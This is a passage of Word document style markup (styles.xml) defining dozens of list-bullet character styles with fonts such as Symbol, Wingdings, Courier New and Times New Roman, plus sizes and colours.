      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num61z3">
    <w:name w:val="WW8Num61z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num64z0">
    <w:name w:val="WW8Num64z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num65z1">
    <w:name w:val="WW8Num65z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z0">
    <w:name w:val="WW8Num67z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z1">
    <w:name w:val="WW8Num67z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z2">
    <w:name w:val="WW8Num67z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z3">
    <w:name w:val="WW8Num67z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num67z4">
    <w:name w:val="WW8Num67z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num68z1">
    <w:name w:val="WW8Num68z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num69z0">
    <w:name w:val="WW8Num69z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num69z1">
    <w:name w:val="WW8Num69z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num69z3">
    <w:name w:val="WW8Num69z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num71z1">
    <w:name w:val="WW8Num71z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z0">
    <w:name w:val="WW8Num72z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z1">
    <w:name w:val="WW8Num72z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z2">
    <w:name w:val="WW8Num72z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z3">
    <w:name w:val="WW8Num72z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z4">
    <w:name w:val="WW8Num72z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num72z7">
    <w:name w:val="WW8Num72z7"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num73z0">
    <w:name w:val="WW8Num73z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num73z1">
    <w:name w:val="WW8Num73z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num73z2">
    <w:name w:val="WW8Num73z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num73z3">
    <w:name w:val="WW8Num73z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num74z0">
    <w:name w:val="WW8Num74z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num74z1">
    <w:name w:val="WW8Num74z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num74z2">
    <w:name w:val="WW8Num74z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num74z3">
    <w:name w:val="WW8Num74z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num75z0">
    <w:name w:val="WW8Num75z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num75z1">
    <w:name w:val="WW8Num75z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num75z3">
    <w:name w:val="WW8Num75z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num76z0">
    <w:name w:val="WW8Num76z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num76z1">
    <w:name w:val="WW8Num76z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num76z3">
    <w:name w:val="WW8Num76z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num77z0">
    <w:name w:val="WW8Num77z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num77z1">
    <w:name w:val="WW8Num77z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num77z3">
    <w:name w:val="WW8Num77z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num79z1">
    <w:name w:val="WW8Num79z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num79z2">
    <w:name w:val="WW8Num79z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num80z0">
    <w:name w:val="WW8Num80z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num80z1">
    <w:name w:val="WW8Num80z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num80z3">
    <w:name w:val="WW8Num80z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num82z0">
    <w:name w:val="WW8Num82z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num82z1">
    <w:name w:val="WW8Num82z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num82z3">
    <w:name w:val="WW8Num82z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num83z0">
    <w:name w:val="WW8Num83z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num83z1">
    <w:name w:val="WW8Num83z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num83z2">
    <w:name w:val="WW8Num83z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num83z3">
    <w:name w:val="WW8Num83z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z0">
    <w:name w:val="WW8Num84z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z1">
    <w:name w:val="WW8Num84z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z3">
    <w:name w:val="WW8Num84z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num84z4">
    <w:name w:val="WW8Num84z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num85z0">
    <w:name w:val="WW8Num85z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num85z1">
    <w:name w:val="WW8Num85z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num85z2">
    <w:name w:val="WW8Num85z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num85z3">
    <w:name w:val="WW8Num85z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num88z0">
    <w:name w:val="WW8Num88z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num88z1">
    <w:name w:val="WW8Num88z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num88z3">
    <w:name w:val="WW8Num88z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z0">
    <w:name w:val="WW8Num89z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z1">
    <w:name w:val="WW8Num89z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z2">
    <w:name w:val="WW8Num89z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z3">
    <w:name w:val="WW8Num89z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num89z4">
    <w:name w:val="WW8Num89z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z0">
    <w:name w:val="WW8Num90z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z1">
    <w:name w:val="WW8Num90z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z2">
    <w:name w:val="WW8Num90z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z3">
    <w:name w:val="WW8Num90z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num90z4">
    <w:name w:val="WW8Num90z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num91z0">
    <w:name w:val="WW8Num91z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num91z1">
    <w:name w:val="WW8Num91z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num91z3">
    <w:name w:val="WW8Num91z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num92z1">
    <w:name w:val="WW8Num92z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num93z0">
    <w:name w:val="WW8Num93z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num93z1">
    <w:name w:val="WW8Num93z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num93z3">
    <w:name w:val="WW8Num93z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="23">
    <w:name w:val="默认段落字体2"/>
    <w:rsid w:val="00895A44"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num5z6">
    <w:name w:val="WW8Num5z6"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num7z6">
    <w:name w:val="WW8Num7z6"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Absatz-Standardschriftart">
    <w:name w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00895A44"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num6z0">
    <w:name w:val="WW8Num6z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z0">
    <w:name w:val="WW8Num10z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z1">
    <w:name w:val="WW8Num10z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z2">
    <w:name w:val="WW8Num10z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num10z3">
    <w:name w:val="WW8Num10z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num12z1">
    <w:name w:val="WW8Num12z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z0">
    <w:name w:val="WW8Num13z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z1">
    <w:name w:val="WW8Num13z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z2">
    <w:name w:val="WW8Num13z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z3">
    <w:name w:val="WW8Num13z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z4">
    <w:name w:val="WW8Num13z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num13z6">
    <w:name w:val="WW8Num13z6"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z0">
    <w:name w:val="WW8Num15z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z1">
    <w:name w:val="WW8Num15z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z2">
    <w:name w:val="WW8Num15z2"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z3">
    <w:name w:val="WW8Num15z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z4">
    <w:name w:val="WW8Num15z4"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num15z6">
    <w:name w:val="WW8Num15z6"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num17z0">
    <w:name w:val="WW8Num17z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num17z1">
    <w:name w:val="WW8Num17z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num17z3">
    <w:name w:val="WW8Num17z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num19z1">
    <w:name w:val="WW8Num19z1"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num28z3">
    <w:name w:val="WW8Num28z3"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WW8Num30z0">
    <w:name w:val="WW8Num30z0"/>
    <w:rsid w:val="00895A44"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
